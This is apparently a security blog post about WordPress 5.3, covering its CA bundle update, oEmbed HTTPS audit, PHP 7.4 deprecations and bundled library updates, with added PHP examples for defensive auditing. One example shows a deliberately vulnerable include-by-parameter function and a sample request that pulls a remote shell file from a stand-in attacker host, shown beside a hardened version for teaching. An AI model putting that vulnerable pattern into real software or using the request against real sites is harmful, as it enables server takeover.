Security News in WordPress 5.3

Even though WordPress 5.3 isn’t a security release, it still ships some interesting security-related changes.

Trusted CA Bundle Update

The root CA bundle has been updated: new CAs were added and some were removed. The downside is that a few 1024-bit RSA CA certificates are still kept in the bundle for backward compatibility, even though 1024-bit RSA is below the current 2048-bit minimum and the major browser root programs dropped such roots years ago.

The new CA bundle file (wp-includes/certificates/ca-bundle.crt in WordPress core) can be viewed here.

A CA bundle is a file containing the root (and sometimes intermediate) certificates that a client trusts. When WordPress makes an outgoing HTTPS connection, for example to fetch automatic updates, the server’s end-entity certificate is validated by building a chain from it up to one of the certificates in this bundle; if no such chain exists, the connection fails.

Let’s hope that WordPress adopts a project like Certainty (Paragon Initiative’s library for keeping a PHP project’s CA bundle current and integrity-checked) in the future.
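As an added example (not WordPress core code), the script below audits a PEM bundle such as wp-includes/certificates/ca-bundle.crt and reports the weak entries the text warns about: RSA keys shorter than 2048 bits, plus SHA-1 signatures and expired certificates as extra review hints. It uses only PHP’s bundled openssl extension; the function names and the 2048-bit threshold are this example’s own choices.

```php
<?php
/**
 * Audit a PEM CA bundle for weak roots (added example, not WordPress code).
 *
 * Usage: php audit-ca-bundle.php /path/to/wp-includes/certificates/ca-bundle.crt
 */

/** Split a PEM bundle into individual certificate blocks. */
function wpsec_split_pem_bundle(string $pem): array
{
    $matches = [];
    preg_match_all(
        '/-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----/s',
        $pem,
        $matches
    );
    return $matches[0];
}

/** Return findings for one certificate, or an empty array if it looks fine. */
function wpsec_audit_certificate(string $pem, int $minRsaBits = 2048): array
{
    $cert = openssl_x509_read($pem);
    if ($cert === false) {
        return ['unparseable certificate'];
    }
    $info    = openssl_x509_parse($cert);
    $key     = openssl_pkey_get_public($cert);
    $details = ($key !== false) ? openssl_pkey_get_details($key) : false;

    $findings = [];
    if ($details !== false
        && $details['type'] === OPENSSL_KEYTYPE_RSA
        && $details['bits'] < $minRsaBits) {
        $findings[] = sprintf('RSA key is only %d bits', $details['bits']);
    }
    // A root is trusted because it is in the bundle, not because of its own
    // signature, but a SHA-1 self-signature still marks an old cert worth a look.
    if (isset($info['signatureTypeSN'])
        && stripos($info['signatureTypeSN'], 'sha1') !== false) {
        $findings[] = 'signed with ' . $info['signatureTypeSN'];
    }
    if (isset($info['validTo_time_t']) && $info['validTo_time_t'] < time()) {
        $findings[] = 'expired on ' . gmdate('Y-m-d', $info['validTo_time_t']);
    }
    return $findings;
}

/** Audit a whole bundle; returns [subject => findings] for problem certs only. */
function wpsec_audit_bundle(string $path): array
{
    $pem = file_get_contents($path);
    if ($pem === false) {
        throw new RuntimeException("cannot read $path");
    }
    $report = [];
    foreach (wpsec_split_pem_bundle($pem) as $i => $certPem) {
        $findings = wpsec_audit_certificate($certPem);
        if ($findings === []) {
            continue;
        }
        $info = openssl_x509_parse($certPem);
        $name = $info['subject']['CN'] ?? $info['subject']['O'] ?? "certificate #$i";
        $report[$name] = $findings;
    }
    return $report;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (wpsec_audit_bundle($argv[1]) as $name => $findings) {
        echo $name, ': ', implode('; ', $findings), PHP_EOL;
    }
}
```

Run it against the bundle shipped with a WordPress install and against the one you get from your distribution or from Certainty; the difference in the "RSA key is only 1024 bits" lines is exactly the backward-compatibility baggage described above.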

Secure oEmbeds

The list of oEmbed providers has been audited, checking:

  • which providers don’t support embedding an https URL
  • which providers don’t serve the embedded content over SSL

This audit also improves the overall security of WordPress: embedding content from an untrusted, non-HTTPS source isn’t safe, particularly when your own installation is served over HTTPS, because it produces mixed content that can be read or tampered with in transit (and that modern browsers block or warn about).
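If you don’t want to rely on the upstream audit alone, a site can enforce the same rule itself. The added example below (not WordPress core code) filters the provider list that WordPress passes through its oembed_providers filter, keeping only providers whose oEmbed endpoint is an https:// URL and, as a heuristic, whose regex pattern can match an https:// content URL. The sample provider array and the example.test domains are constructed for illustration; the function names are this example’s own.

```php
<?php
/**
 * HTTPS-only oEmbed providers (added example, not WordPress code).
 * Shape mirrors the 'oembed_providers' filter: pattern => [endpoint, is_regex].
 */

/** Heuristic: can this provider pattern match at least one https:// URL? */
function wpsec_pattern_accepts_https(string $pattern, bool $isRegex): bool
{
    if (!$isRegex) {
        // Wildcard form ("http://*.example.test/*"): WordPress compiles an
        // http:// prefix to https?:// itself, so treat it as accepting HTTPS.
        return true;
    }
    // Regex form: '#https?://...#' or '#https://...#' contains "https",
    // a literal '#http://...#' does not.
    return stripos($pattern, 'https') !== false;
}

/** Drop providers with a cleartext endpoint or an http-only match pattern. */
function wpsec_https_only_oembed_providers(array $providers): array
{
    $kept = [];
    foreach ($providers as $pattern => $provider) {
        [$endpoint, $isRegex] = $provider;
        if (strncasecmp($endpoint, 'https://', 8) !== 0) {
            continue; // the oEmbed response itself would travel in clear text
        }
        if (!wpsec_pattern_accepts_https((string) $pattern, (bool) $isRegex)) {
            continue; // provider can only ever embed http:// content URLs
        }
        $kept[$pattern] = $provider;
    }
    return $kept;
}

// Constructed sample in the same shape as the core provider list.
$wpsec_sample_providers = [
    '#https?://(www\.)?youtube\.com/watch.*#i' => ['https://www.youtube.com/oembed', true],
    '#http://video\.example\.test/.*#i'        => ['https://video.example.test/oembed', true], // http-only pattern
    '#https?://plain\.example\.test/.*#i'      => ['http://plain.example.test/oembed', true],  // cleartext endpoint
    'https://*.tiles.example.test/*'           => ['https://tiles.example.test/oembed', false],
];

if (function_exists('add_filter')) {
    // Inside WordPress (e.g. a mu-plugin): hook the filter onto the real list.
    add_filter('oembed_providers', 'wpsec_https_only_oembed_providers');
} else {
    // Stand-alone: only the YouTube and tiles providers survive the filter.
    print_r(array_keys(wpsec_https_only_oembed_providers($wpsec_sample_providers)));
}
```

The pattern check is deliberately a heuristic: it catches the common case of a provider that only registered an http:// match, but a regex can express scheme handling in ways a substring test won’t see, so review the filtered list rather than trusting it blindly.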

PHP 7.4 Compatibility

Supporting PHP 7.4 is good for security: PHP 7.4 deprecates the insecure allow_url_include ini directive and the leftover magic_quotes functions (get_magic_quotes_gpc() and get_magic_quotes_runtime()), both of which are removed in PHP 8, so sites running WordPress 5.3 can move to a current PHP release that no longer supports them.
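To show what allow_url_include actually enables, here is an added example (not WordPress code) with the classic include-by-request-parameter bug next to a hardened allowlist version, plus a small report of the settings the text mentions. With allow_url_include=On, the unsafe function would fetch and execute a remote file for a request such as ?page=http://attacker.example/shell.txt%3F (constructed attacker URL); the safe version never lets request data reach include at all. Function and constant names are this example’s own.

```php
<?php
/**
 * Remote file inclusion vs. allowlisted include (added example, not WordPress code).
 */

// Vulnerable: user input decides what gets included. With allow_url_include=On
// a URL is accepted here; even with it off, ../ traversal to local files works.
function page_include_unsafe(string $page): void
{
    include $page . '.php';
}

// Hardened: the request only selects a key from a fixed map; the path is built
// from constants, so neither URLs nor traversal sequences can reach include.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES    = ['home' => 'home.php', 'about' => 'about.php'];

function page_include_safe(string $page): bool
{
    if (!array_key_exists($page, PAGES)) {
        return false; // unknown page: refuse rather than guess
    }
    $path = PAGE_DIR . '/' . PAGES[$page];
    if (!is_file($path)) {
        return false;
    }
    include $path;
    return true;
}

/**
 * Defence in depth: report the settings discussed above. On PHP 7.4
 * allow_url_include still works but is deprecated; the magic_quotes getters
 * are deprecated there and gone in PHP 8.
 */
function wpsec_php_hardening_report(): array
{
    return [
        'php_version'        => PHP_VERSION,
        'allow_url_include'  => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_fopen'    => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'magic_quotes_funcs' => function_exists('get_magic_quotes_gpc'),
    ];
}

if (PHP_SAPI === 'cli') {
    print_r(wpsec_php_hardening_report());
}
```

The point of the report is that the fix is not "upgrade to 7.4" on its own: allow_url_include=On is still honoured there, so check the setting on the server, and treat any code shaped like page_include_unsafe() as a bug regardless of the PHP version.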

Third party updates

Keeping third-party modules and libraries up to date is a security best practice, and WordPress 5.3 updates the following bundled third-party libraries:

  • Backbone.js from 1.3.3 to 1.4.0
  • getID3 from 1.9.14 to a patched version of 1.9.18
  • jQueryColor from 2.1.1 to 2.1.2
  • Lodash from 4.17.11 to 4.17.15
  • MediaElement.js from 4.2.6 to 4.2.13
  • PHPMailer from 5.2.22 to a patched version of 5.2.27
  • React and ReactDOM from 16.8.4 to 16.9.0
  • Requests from 1.7 to a patched version
  • TinyMCE from 4.9.4 to 4.9.6
  • Twemoji from 12.0.1 to 12.1.2

We recommend that you run a free security scan at wpsec.com.
